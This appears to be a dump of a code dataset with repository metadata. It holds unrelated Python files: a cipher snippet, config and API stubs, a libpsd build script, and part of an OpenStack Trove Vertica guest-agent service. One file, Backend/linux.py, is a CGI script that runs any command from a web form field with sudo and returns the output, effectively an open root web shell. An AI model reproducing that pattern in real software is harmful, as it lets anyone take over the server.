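    s, key = s.replace(' ', '').upper(), key.replace(' ', '').upper()
    out = []
    for i, ch in enumerate(s):
        k = U.index(key[i % len(key)])
        shift = -k if decode else k
        out.append(U[(U.index(ch) + shift) % 26])
    return ''.join(out)

ct = vigenere('ATTACK AT DAWN', 'LEMON')
print(ct)                                              # prints LXFOPVEFRNHR
assert vigenere(ct, 'LEMON', decode=True) == 'ATTACKATDAWN'
```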
| 30.196429 | 74 | 0.350089 | 628 | 5,073 | 2.794586 | 0.294586 | 0.025641 | 0.023932 | 0.030769 | 0.173219 | 0.126496 | 0.083191 | 0.046724 | 0.02963 | 0.02963 | 0 | 0.039138 | 0.350286 | 5,073 | 167 | 75 | 30.377246 | 0.493325 | 0.130298 | 0 | 0.140351 | 0 | 0 | 0.142032 | 0 | 0 | 0 | 0 | 0.005988 | 0 | 1 | 0.078947 | false | 0 | 0.017544 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7daef8b7f43d19ad4b4a4241d53911344a3bad74 | 675 | py | Python | ABNOOrchestrator/ABNOParameters.py | HPNLAB/ABNO-FUTEBOL | 3a1dbee11abd9a808d337a6bbdccba052671d33c | [
"Apache-2.0"
] | null | null | null | ABNOOrchestrator/ABNOParameters.py | HPNLAB/ABNO-FUTEBOL | 3a1dbee11abd9a808d337a6bbdccba052671d33c | [
"Apache-2.0"
] | null | null | null | ABNOOrchestrator/ABNOParameters.py | HPNLAB/ABNO-FUTEBOL | 3a1dbee11abd9a808d337a6bbdccba052671d33c | [
"Apache-2.0"
] | null | null | null | __author__ = 'alejandroaguado'
from xml.etree import ElementTree
class ABNOParameters:
def __init__(self, filename):
self.document = ElementTree.parse(filename)
root = self.document.getroot()
tag = self.document.find('abnoconfig')
self.address = tag.attrib['address']
self.port = int(tag.attrib['port'])
tag = self.document.find('pceconfig')
self.pceaddress = tag.attrib['address']
self.pceport = int(tag.attrib['port'])
tag = self.document.find('pmconfig')
self.pmaddress = tag.attrib['address']
self.pmport = int(tag.attrib['port'])
#tag = self.document.find('properties') | 35.526316 | 51 | 0.638519 | 75 | 675 | 5.64 | 0.413333 | 0.170213 | 0.141844 | 0.179669 | 0.248227 | 0.248227 | 0.248227 | 0.248227 | 0 | 0 | 0 | 0 | 0.219259 | 675 | 19 | 52 | 35.526316 | 0.802657 | 0.056296 | 0 | 0 | 0 | 0 | 0.117739 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.066667 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
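The attribute extraction above can be exercised against an in-memory document; the XML layout here is an assumption inferred from the tag and attribute names the parser looks up:

```python
import io
from xml.etree import ElementTree

# Hypothetical config shaped the way ABNOParameters reads it.
XML = """<config>
    <abnoconfig address="10.0.0.1" port="8080"/>
    <pceconfig address="10.0.0.2" port="4189"/>
    <pmconfig address="10.0.0.3" port="9000"/>
</config>"""

doc = ElementTree.parse(io.StringIO(XML))
tag = doc.find('abnoconfig')
print(tag.attrib['address'], int(tag.attrib['port']))  # prints 10.0.0.1 8080
```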
7dafc11fd8fb86ab44db99cb63fe8f3a5c118843 | 277 | py | Python | influencer-detection/src/api/influencers/api/v1.py | luisblazquezm/influencer-detection | bd8aec83cbd8e5fbb3231824b5e274c47f491501 | [
"Apache-2.0"
] | 4 | 2021-05-22T16:33:41.000Z | 2021-11-22T23:44:40.000Z | influencer-detection/src/api/influencers/api/v1.py | Alburrito/influencer-detection | bd8aec83cbd8e5fbb3231824b5e274c47f491501 | [
"Apache-2.0"
] | null | null | null | influencer-detection/src/api/influencers/api/v1.py | Alburrito/influencer-detection | bd8aec83cbd8e5fbb3231824b5e274c47f491501 | [
"Apache-2.0"
] | 2 | 2021-05-21T16:34:14.000Z | 2021-09-29T12:59:49.000Z | #!flask/bin/python
# Copyright 2021 Luis Blazquez Miñambres (@luisblazquezm)
# See LICENSE for details.
from flask_restx import Api
api = Api(version='1.0',
title='Influencer Detection Project',
description="**PORBI Influencer Detection project's Flask RESTX API**") | 27.7 | 75 | 0.747292 | 36 | 277 | 5.722222 | 0.75 | 0.097087 | 0.252427 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025316 | 0.144404 | 277 | 10 | 75 | 27.7 | 0.843882 | 0.353791 | 0 | 0 | 0 | 0 | 0.491525 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7db6acccc13d73c452c9d80805e389c51f138158 | 346 | py | Python | Backend/linux.py | TheInvincibleLearner/simranquirky.github.io | 21a2524b321493b9ff82eb8b4fcc10af8f8face7 | [
"MIT"
] | null | null | null | Backend/linux.py | TheInvincibleLearner/simranquirky.github.io | 21a2524b321493b9ff82eb8b4fcc10af8f8face7 | [
"MIT"
] | 10 | 2021-09-29T13:25:21.000Z | 2021-10-05T13:51:36.000Z | Backend/linux.py | TheInvincibleLearner/simranquirky.github.io | 21a2524b321493b9ff82eb8b4fcc10af8f8face7 | [
"MIT"
] | 7 | 2021-09-22T13:26:35.000Z | 2021-10-05T03:07:43.000Z | #!/usr/bin/python3
print("content-type: text/html")
print()
import subprocess as sp
import cgi
fs = cgi.FieldStorage()
cmd = fs.getvalue("command")
output = sp.getoutput("sudo "+cmd)
print("<body style='padding: 40px;'>")
print('<h1 style="color:#df405a;" >Output</h1>')
print("<pre>{}</pre>".format(output))
print("</body>")
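Interpolating a raw form field into a shell command, as `"sudo "+cmd` does above, is deliberate for this remote-shell page, but wherever untrusted input must reach a shell, `shlex.quote` makes metacharacters literal; a standalone illustration:

```python
import shlex
import subprocess

user_input = "date; rm -rf /tmp/x"        # hostile value from a form field
safe = "echo " + shlex.quote(user_input)  # the semicolon is now a literal char
out = subprocess.getoutput(safe)
print(out)                                # prints date; rm -rf /tmp/x
```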
| 20.352941 | 49 | 0.635838 | 46 | 346 | 4.782609 | 0.652174 | 0.081818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026846 | 0.138728 | 346 | 16 | 50 | 21.625 | 0.711409 | 0.049133 | 0 | 0 | 0 | 0 | 0.394231 | 0.070513 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0.545455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
7dbf4c0c61fb56b588d550f32b9ba42ac0a71e93 | 3,506 | py | Python | Thirdparty/libpsd/build.py | stinvi/dava.engine | 2b396ca49cdf10cdc98ad8a9ffcf7768a05e285e | [
"BSD-3-Clause"
] | 26 | 2018-09-03T08:48:22.000Z | 2022-02-14T05:14:50.000Z | Thirdparty/libpsd/build.py | ANHELL-blitz/dava.engine | ed83624326f000866e29166c7f4cccfed1bb41d4 | [
"BSD-3-Clause"
] | null | null | null | Thirdparty/libpsd/build.py | ANHELL-blitz/dava.engine | ed83624326f000866e29166c7f4cccfed1bb41d4 | [
"BSD-3-Clause"
] | 45 | 2018-05-11T06:47:17.000Z | 2022-02-03T11:30:55.000Z | import os
import shutil
import build_utils
def get_supported_targets(platform):
if platform == 'win32':
return ['win32']
elif platform == 'darwin':
return ['macos']
elif platform == 'linux':
return ['linux']
else:
return []
def get_dependencies_for_target(target):
if target == 'win32':
return ['zlib']
else:
return []
def build_for_target(target, working_directory_path, root_project_path):
if target == 'win32':
_build_win32(working_directory_path, root_project_path)
elif target == 'macos':
_build_macos(working_directory_path, root_project_path)
elif target == 'linux':
_build_linux(working_directory_path, root_project_path)
def get_download_info():
return 'https://sourceforge.net/projects/libpsd/files/libpsd/0.9/libpsd-0.9.zip'
def _download_and_extract(working_directory_path):
source_folder_path = os.path.join(working_directory_path, 'libpsd_source')
url = get_download_info()
build_utils.download_and_extract(
url,
working_directory_path,
source_folder_path,
build_utils.get_url_file_name_no_ext(url))
return source_folder_path
@build_utils.run_once
def _patch_sources(source_folder_path, working_directory_path):
build_utils.apply_patch(
os.path.abspath('patch_v0.9.diff'), working_directory_path)
shutil.copyfile(
'CMakeLists.txt', os.path.join(source_folder_path, 'CMakeLists.txt'))
def _build_win32(working_directory_path, root_project_path):
source_folder_path = _download_and_extract(working_directory_path)
_patch_sources(source_folder_path, working_directory_path)
cmake_flags = ['-DZLIB_INCLUDE_DIR=' + os.path.join(working_directory_path, '../zlib/zlib_source/')]
build_utils.build_and_copy_libraries_win32_cmake(
os.path.join(working_directory_path, 'gen'),
source_folder_path,
root_project_path,
'psd.sln', 'psd',
'psd.lib', 'psd.lib',
'libpsd.lib', 'libpsd.lib',
'libpsd.lib', 'libpsd.lib',
cmake_flags,
static_runtime=False)
_copy_headers(source_folder_path, root_project_path)
def _build_macos(working_directory_path, root_project_path):
source_folder_path = _download_and_extract(working_directory_path)
_patch_sources(source_folder_path, working_directory_path)
build_utils.build_and_copy_libraries_macos_cmake(
os.path.join(working_directory_path, 'gen'),
source_folder_path,
root_project_path,
'psd.xcodeproj', 'psd',
'libpsd.a',
'libpsd.a')
_copy_headers(source_folder_path, root_project_path)
def _build_linux(working_directory_path, root_project_path):
source_folder_path = _download_and_extract(working_directory_path)
_patch_sources(source_folder_path, working_directory_path)
build_utils.build_and_copy_libraries_linux_cmake(
gen_folder_path=os.path.join(working_directory_path, 'gen'),
source_folder_path=source_folder_path,
root_project_path=root_project_path,
target="all",
lib_name='libpsd.a')
_copy_headers(source_folder_path, root_project_path)
def _copy_headers(source_folder_path, root_project_path):
include_path = os.path.join(root_project_path, 'Libs/include/libpsd')
build_utils.copy_files_by_name(
os.path.join(source_folder_path, 'include'),
include_path,
['libpsd.h', 'psd_color.h', 'psd_types.h'])
| 31.585586 | 104 | 0.72162 | 454 | 3,506 | 5.092511 | 0.180617 | 0.152249 | 0.190311 | 0.12327 | 0.643166 | 0.626298 | 0.514273 | 0.497405 | 0.38192 | 0.38192 | 0 | 0.006952 | 0.179407 | 3,506 | 110 | 105 | 31.872727 | 0.796663 | 0 | 0 | 0.289157 | 0 | 0.012048 | 0.112094 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.120482 | false | 0 | 0.036145 | 0.012048 | 0.253012 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7dc1969b2d44d9ad370f7f09a3b9e9919cb4e854 | 589 | py | Python | Combinatorialifier.py | Theta291/Partial-Application-in-Python | db503fbf7a1c173c01fca86a858875e38c41997a | [
"MIT"
] | null | null | null | Combinatorialifier.py | Theta291/Partial-Application-in-Python | db503fbf7a1c173c01fca86a858875e38c41997a | [
"MIT"
] | null | null | null | Combinatorialifier.py | Theta291/Partial-Application-in-Python | db503fbf7a1c173c01fca86a858875e38c41997a | [
"MIT"
] | null | null | null | #Exercise: Try to make a function that accepts a function of only positional arguments and returns a function that takes the same number of positional arguments and, given they are all iterators, attempts every combination of one arguments from each iterator.
#Skills: Partial application, Iteration
papplycomboreverse = lambda fun, xiter : lambda *args : [fun(*args, x) for x in xiter]
def combo(fun):
def returnfun(*args):
currfun = fun
for arg in reversed(args):
currfun = papplycomboreverse(currfun, arg)
return currfun()
return returnfun
| 45.307692 | 259 | 0.726655 | 79 | 589 | 5.417722 | 0.620253 | 0.063084 | 0.060748 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.212224 | 589 | 12 | 260 | 49.083333 | 0.922414 | 0.502547 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7dc490740f712aa8ee9b1a1e793a10bb7cab5ed9 | 27,885 | py | Python | trove-11.0.0/trove/guestagent/datastore/experimental/vertica/service.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 1 | 2020-04-08T07:42:19.000Z | 2020-04-08T07:42:19.000Z | trove/guestagent/datastore/experimental/vertica/service.py | ttcong/trove | 1db2dc63fdd5409eafccebe79ff2900d0535ed13 | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | trove/guestagent/datastore/experimental/vertica/service.py | ttcong/trove | 1db2dc63fdd5409eafccebe79ff2900d0535ed13 | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | # Copyright [2015] Hewlett-Packard Development Company, L.P.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import tempfile
from oslo_log import log as logging
from oslo_utils import netutils
from six.moves import configparser
from trove.common import cfg
from trove.common.db import models
from trove.common import exception
from trove.common.i18n import _
from trove.common import instance as rd_instance
from trove.common.stream_codecs import PropertiesCodec
from trove.common import utils
from trove.guestagent.common.configuration import ConfigurationManager
from trove.guestagent.common.configuration import ImportOverrideStrategy
from trove.guestagent.common import guestagent_utils
from trove.guestagent.common import operating_system
from trove.guestagent.common.operating_system import FileMode
from trove.guestagent.datastore.experimental.vertica import system
from trove.guestagent.datastore import service
from trove.guestagent import pkg
from trove.guestagent import volume
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
packager = pkg.Package()
DB_NAME = 'db_srvr'
MOUNT_POINT = CONF.vertica.mount_point
# We will use a fake configuration file for the options managed through
# configuration groups that we apply directly with ALTER DB ... SET ...
FAKE_CFG = os.path.join(MOUNT_POINT, "vertica.cfg.fake")
class VerticaAppStatus(service.BaseDbStatus):
def _get_actual_db_status(self):
"""Get the status of dbaas and report it back."""
try:
out, err = system.shell_execute(system.STATUS_ACTIVE_DB,
system.VERTICA_ADMIN)
if out.strip() == DB_NAME:
# UP status is confirmed
LOG.info("Service Status is RUNNING.")
return rd_instance.ServiceStatuses.RUNNING
else:
LOG.info("Service Status is SHUTDOWN.")
return rd_instance.ServiceStatuses.SHUTDOWN
except exception.ProcessExecutionError:
LOG.exception("Failed to get database status.")
return rd_instance.ServiceStatuses.CRASHED
class VerticaApp(object):
"""Prepares DBaaS on a Guest container."""
def __init__(self, status):
self.state_change_wait_time = CONF.state_change_wait_time
self.status = status
revision_dir = \
guestagent_utils.build_file_path(
os.path.join(MOUNT_POINT,
os.path.dirname(system.VERTICA_ADMIN)),
ConfigurationManager.DEFAULT_STRATEGY_OVERRIDES_SUB_DIR)
if not operating_system.exists(FAKE_CFG):
operating_system.write_file(FAKE_CFG, '', as_root=True)
operating_system.chown(FAKE_CFG, system.VERTICA_ADMIN,
system.VERTICA_ADMIN_GRP, as_root=True)
operating_system.chmod(FAKE_CFG, FileMode.ADD_GRP_RX_OTH_RX(),
as_root=True)
self.configuration_manager = \
ConfigurationManager(FAKE_CFG, system.VERTICA_ADMIN,
system.VERTICA_ADMIN_GRP,
PropertiesCodec(delimiter='='),
requires_root=True,
override_strategy=ImportOverrideStrategy(
revision_dir, "cnf"))
def update_overrides(self, context, overrides, remove=False):
if overrides:
self.apply_overrides(overrides)
def remove_overrides(self):
config = self.configuration_manager.get_user_override()
self._reset_config(config)
self.configuration_manager.remove_user_override()
def apply_overrides(self, overrides):
self.configuration_manager.apply_user_override(overrides)
self._apply_config(overrides)
def _reset_config(self, config):
try:
db_password = self._get_database_password()
for k, v in config.items():
alter_db_cmd = system.ALTER_DB_RESET_CFG % (DB_NAME, str(k))
out, err = system.exec_vsql_command(db_password, alter_db_cmd)
if err:
if err.is_warning():
LOG.warning(err)
else:
LOG.error(err)
raise RuntimeError(_("Failed to remove config %s") % k)
except Exception:
LOG.exception("Vertica configuration remove failed.")
raise RuntimeError(_("Vertica configuration remove failed."))
LOG.info("Vertica configuration reset completed.")
def _apply_config(self, config):
try:
db_password = self._get_database_password()
for k, v in config.items():
alter_db_cmd = system.ALTER_DB_CFG % (DB_NAME, str(k), str(v))
out, err = system.exec_vsql_command(db_password, alter_db_cmd)
if err:
if err.is_warning():
LOG.warning(err)
else:
LOG.error(err)
raise RuntimeError(_("Failed to apply config %s") % k)
except Exception:
LOG.exception("Vertica configuration apply failed")
raise RuntimeError(_("Vertica configuration apply failed"))
LOG.info("Vertica config apply completed.")
    def _enable_db_on_boot(self):
        try:
            command = ["sudo", "su", "-", system.VERTICA_ADMIN, "-c",
                       (system.SET_RESTART_POLICY % (DB_NAME, "always"))]
            subprocess.Popen(command)
            command = ["sudo", "su", "-", "root", "-c",
                       (system.VERTICA_AGENT_SERVICE_COMMAND % "enable")]
            subprocess.Popen(command)
        except Exception:
            LOG.exception("Failed to enable database on boot.")
            raise RuntimeError(_("Could not enable database on boot."))

    def _disable_db_on_boot(self):
        try:
            command = (system.SET_RESTART_POLICY % (DB_NAME, "never"))
            system.shell_execute(command, system.VERTICA_ADMIN)
            command = (system.VERTICA_AGENT_SERVICE_COMMAND % "disable")
            system.shell_execute(command)
        except exception.ProcessExecutionError:
            LOG.exception("Failed to disable database on boot.")
            raise RuntimeError(_("Could not disable database on boot."))
    def stop_db(self, update_db=False, do_not_start_on_reboot=False):
        """Stop the database."""
        LOG.info("Stopping Vertica.")
        if do_not_start_on_reboot:
            self._disable_db_on_boot()
        try:
            # Stop the vertica-agent service.
            command = (system.VERTICA_AGENT_SERVICE_COMMAND % "stop")
            system.shell_execute(command)
            # Using Vertica adminTools to stop db.
            db_password = self._get_database_password()
            stop_db_command = (system.STOP_DB % (DB_NAME, db_password))
            out, err = system.shell_execute(system.STATUS_ACTIVE_DB,
                                            system.VERTICA_ADMIN)
            if out.strip() == DB_NAME:
                system.shell_execute(stop_db_command, system.VERTICA_ADMIN)
                if not self.status._is_restarting:
                    if not self.status.wait_for_real_status_to_change_to(
                            rd_instance.ServiceStatuses.SHUTDOWN,
                            self.state_change_wait_time, update_db):
                        LOG.error("Could not stop Vertica.")
                        self.status.end_restart()
                        raise RuntimeError(_("Could not stop Vertica!"))
                LOG.debug("Database stopped.")
            else:
                LOG.debug("Database is not running.")
        except exception.ProcessExecutionError:
            LOG.exception("Failed to stop database.")
            raise RuntimeError(_("Could not stop database."))
    def start_db(self, update_db=False):
        """Start the database."""
        LOG.info("Starting Vertica.")
        try:
            self._enable_db_on_boot()
            # Start the vertica-agent service.
            command = ["sudo", "su", "-", "root", "-c",
                       (system.VERTICA_AGENT_SERVICE_COMMAND % "start")]
            subprocess.Popen(command)
            # Using Vertica adminTools to start db.
            db_password = self._get_database_password()
            start_db_command = ["sudo", "su", "-", system.VERTICA_ADMIN, "-c",
                                (system.START_DB % (DB_NAME, db_password))]
            subprocess.Popen(start_db_command)
            if not self.status._is_restarting:
                self.status.end_restart()
            LOG.debug("Database started.")
        except Exception as e:
            raise RuntimeError(_("Could not start Vertica due to %s") % e)

    def start_db_with_conf_changes(self, config_contents):
        """
        Currently all that this method does is to start Vertica. This method
        needs to be implemented to enable volume resize on guestagent side.
        """
        LOG.info("Starting Vertica with configuration changes.")
        if self.status.is_running:
            msg = 'Cannot start_db_with_conf_changes because status is %s.'
            LOG.debug(msg, self.status)
            raise RuntimeError(msg % self.status)
        LOG.info("Initiating config.")
        self.configuration_manager.save_configuration(config_contents)
        self.start_db(True)
    def restart(self):
        """Restart the database."""
        try:
            self.status.begin_restart()
            self.stop_db()
            self.start_db()
        finally:
            self.status.end_restart()

    def add_db_to_node(self, members=netutils.get_my_ipv4()):
        """Add db to host with admintools."""
        LOG.info("Calling admintools to add DB to host.")
        try:
            # Add the db to the node.
            db_password = self._get_database_password()
            add_db_command = (system.ADD_DB_TO_NODE % (members,
                                                       DB_NAME,
                                                       db_password))
            system.shell_execute(add_db_command, "dbadmin")
        except exception.ProcessExecutionError:
            # Give vertica some time to get the node up; it won't be available
            # by the time adminTools -t db_add_node completes.
            LOG.info("adminTools failed as expected - wait for node.")
            self.wait_for_node_status()
        LOG.info("Vertica add db to host completed.")
    def remove_db_from_node(self, members=netutils.get_my_ipv4()):
        """Remove db from node with admintools."""
        LOG.info("Removing db from node.")
        try:
            # Remove the db from the node.
            db_password = self._get_database_password()
            remove_db_command = (system.REMOVE_DB_FROM_NODE % (members,
                                                               DB_NAME,
                                                               db_password))
            system.shell_execute(remove_db_command, "dbadmin")
        except exception.ProcessExecutionError:
            LOG.info("adminTools failed as expected - wait for node.")
        # Give vertica some time to take the node down; it won't be available
        # by the time adminTools -t db_remove_node completes.
        self.wait_for_node_status()
        LOG.info("Vertica remove host from db completed.")
    def create_db(self, members=netutils.get_my_ipv4()):
        """Prepare the guest machine with a Vertica db creation."""
        LOG.info("Creating database on Vertica host.")
        try:
            # Create db after install.
            db_password = self._get_database_password()
            create_db_command = (system.CREATE_DB % (members, DB_NAME,
                                                     MOUNT_POINT, MOUNT_POINT,
                                                     db_password))
            system.shell_execute(create_db_command, system.VERTICA_ADMIN)
        except Exception:
            LOG.exception("Vertica database create failed.")
            raise RuntimeError(_("Vertica database create failed."))
        LOG.info("Vertica database create completed.")

    def install_vertica(self, members=netutils.get_my_ipv4()):
        """Prepare the guest machine with a Vertica server installation."""
        LOG.info("Installing Vertica Server.")
        try:
            # Install the Vertica packages on the given members.
            install_vertica_cmd = (system.INSTALL_VERTICA % (members,
                                                             MOUNT_POINT))
            system.shell_execute(install_vertica_cmd)
        except exception.ProcessExecutionError:
            LOG.exception("install_vertica failed.")
            raise RuntimeError(_("install_vertica failed."))
        self._generate_database_password()
        LOG.info("install_vertica completed.")
    def update_vertica(self, command, members=netutils.get_my_ipv4()):
        LOG.info("Calling update_vertica with command %s", command)
        try:
            update_vertica_cmd = (system.UPDATE_VERTICA % (command, members,
                                                           MOUNT_POINT))
            system.shell_execute(update_vertica_cmd)
        except exception.ProcessExecutionError:
            LOG.exception("update_vertica failed.")
            raise RuntimeError(_("update_vertica failed."))
        # self._generate_database_password()
        LOG.info("update_vertica completed.")

    def add_udls(self):
        """Load the user defined load libraries into the database."""
        LOG.info("Adding configured user defined load libraries.")
        password = self._get_database_password()
        loaded_udls = []
        for lib in system.UDL_LIBS:
            func_name = lib['func_name']
            lib_name = lib['lib_name']
            language = lib['language']
            factory = lib['factory']
            path = lib['path']
            if os.path.isfile(path):
                LOG.debug("Adding the %(func)s library as %(lib)s.",
                          {'func': func_name, 'lib': lib_name})
                out, err = system.exec_vsql_command(
                    password,
                    system.CREATE_LIBRARY % (lib_name, path)
                )
                if err:
                    if err.is_warning():
                        LOG.warning(err)
                    else:
                        LOG.error(err)
                        raise RuntimeError(_("Failed to create library %s.")
                                           % lib_name)
                out, err = system.exec_vsql_command(
                    password,
                    system.CREATE_SOURCE % (func_name, language,
                                            factory, lib_name)
                )
                if err:
                    if err.is_warning():
                        LOG.warning(err)
                    else:
                        LOG.error(err)
                        raise RuntimeError(_("Failed to create source %s.")
                                           % func_name)
                loaded_udls.append(func_name)
            else:
                LOG.warning("Skipping %(func)s as path %(path)s not "
                            "found.", {"func": func_name, "path": path})
        LOG.info("The following UDL functions are available for use: %s",
                 loaded_udls)
    def _generate_database_password(self):
        """Generate and write the password to vertica.cnf file."""
        config = configparser.ConfigParser()
        config.add_section('credentials')
        config.set('credentials', 'dbadmin_password',
                   utils.generate_random_password())
        self.write_config(config)

    def write_config(self, config,
                     unlink_function=os.unlink,
                     temp_function=tempfile.NamedTemporaryFile):
        """Write the configuration contents to vertica.cnf file."""
        LOG.debug('Defining config holder at %s.', system.VERTICA_CONF)
        temp_file = temp_function('w', delete=False)
        try:
            config.write(temp_file)
            temp_file.close()
            command = (("install -o root -g root -m 644 %(source)s %(target)s"
                        ) % {'source': temp_file.name,
                             'target': system.VERTICA_CONF})
            system.shell_execute(command)
            unlink_function(temp_file.name)
        except Exception:
            unlink_function(temp_file.name)
            raise
    def read_config(self):
        """Reads and returns the Vertica config."""
        try:
            config = configparser.ConfigParser()
            config.read(system.VERTICA_CONF)
            return config
        except Exception:
            LOG.exception("Failed to read config %s.", system.VERTICA_CONF)
            raise RuntimeError(_("Failed to read config %s.")
                               % system.VERTICA_CONF)

    def _get_database_password(self):
        """Read the password from vertica.cnf file and return it."""
        return self.read_config().get('credentials', 'dbadmin_password')

    def install_if_needed(self, packages):
        """Install Vertica package if needed."""
        LOG.info("Preparing Guest as Vertica Server.")
        if not packager.pkg_is_installed(packages):
            LOG.debug("Installing Vertica Package.")
            packager.pkg_install(packages, None, system.INSTALL_TIMEOUT)

    def _set_readahead_for_disks(self):
        """This method sets the readahead size for disks as needed by Vertica."""
        device = volume.VolumeDevice(CONF.device_path)
        device.set_readahead_size(CONF.vertica.readahead_size)
        LOG.debug("Set readahead size as required by Vertica.")
    def prepare_for_install_vertica(self):
        """This method executes preparatory methods before
        executing install_vertica.
        """
        command = ("VERT_DBA_USR=%s VERT_DBA_HOME=/home/dbadmin "
                   "VERT_DBA_GRP=%s /opt/vertica/oss/python/bin/python"
                   " -m vertica.local_coerce" %
                   (system.VERTICA_ADMIN, system.VERTICA_ADMIN_GRP))
        try:
            self._set_readahead_for_disks()
            system.shell_execute(command)
        except exception.ProcessExecutionError:
            LOG.exception("Failed to prepare for install_vertica.")
            raise

    def mark_design_ksafe(self, k):
        """Wrapper for mark_design_ksafe function for setting k-safety."""
        LOG.info("Setting Vertica k-safety to %s", str(k))
        out, err = system.exec_vsql_command(self._get_database_password(),
                                            system.MARK_DESIGN_KSAFE % k)
        # Only fail if we get an ERROR as opposed to a warning complaining
        # about setting k = 0.
        if "ERROR" in err:
            LOG.error(err)
            raise RuntimeError(_("Failed to set k-safety level %s.") % k)
    def _create_user(self, username, password, role=None):
        """Creates a user, granting and enabling the given role for it."""
        LOG.info("Creating user in Vertica database.")
        out, err = system.exec_vsql_command(self._get_database_password(),
                                            system.CREATE_USER %
                                            (username, password))
        if err:
            if err.is_warning():
                LOG.warning(err)
            else:
                LOG.error(err)
                raise RuntimeError(_("Failed to create user %s.") % username)
        if role:
            self._grant_role(username, role)

    def _grant_role(self, username, role):
        """Grants a role to the user on the schema."""
        out, err = system.exec_vsql_command(self._get_database_password(),
                                            system.GRANT_TO_USER
                                            % (role, username))
        if err:
            if err.is_warning():
                LOG.warning(err)
            else:
                LOG.error(err)
                raise RuntimeError(_("Failed to grant role %(r)s to user "
                                     "%(u)s.")
                                   % {'r': role, 'u': username})
        out, err = system.exec_vsql_command(self._get_database_password(),
                                            system.ENABLE_FOR_USER
                                            % (username, role))
        if err:
            LOG.warning(err)
    def enable_root(self, root_password=None):
        """Resets the root password."""
        LOG.info("Enabling root.")
        user = models.DatastoreUser.root(password=root_password)
        if not self.is_root_enabled():
            self._create_user(user.name, user.password, 'pseudosuperuser')
        else:
            LOG.debug("Updating %s password.", user.name)
            try:
                out, err = system.exec_vsql_command(
                    self._get_database_password(),
                    system.ALTER_USER_PASSWORD % (user.name, user.password))
                if err:
                    if err.is_warning():
                        LOG.warning(err)
                    else:
                        LOG.error(err)
                        raise RuntimeError(_("Failed to update %s "
                                             "password.") % user.name)
            except exception.ProcessExecutionError:
                LOG.error("Failed to update %s password.", user.name)
                raise RuntimeError(_("Failed to update %s password.")
                                   % user.name)
        return user.serialize()

    def is_root_enabled(self):
        """Return True if root access is enabled else False."""
        LOG.debug("Checking is root enabled.")
        try:
            out, err = system.shell_execute(system.USER_EXISTS %
                                            (self._get_database_password(),
                                             'root'), system.VERTICA_ADMIN)
            if err:
                LOG.error(err)
                raise RuntimeError(_("Failed to query for root user."))
        except exception.ProcessExecutionError:
            raise RuntimeError(_("Failed to query for root user."))
        return out.rstrip() == "1"
    def get_public_keys(self, user):
        """Generates key (if not found), and sends public key for user."""
        LOG.debug("Public keys requested for user: %s.", user)
        user_home_directory = os.path.expanduser('~' + user)
        public_key_file_name = user_home_directory + '/.ssh/id_rsa.pub'

        try:
            key_generate_command = (system.SSH_KEY_GEN % user_home_directory)
            system.shell_execute(key_generate_command, user)
        except exception.ProcessExecutionError:
            LOG.debug("Cannot generate key.")

        try:
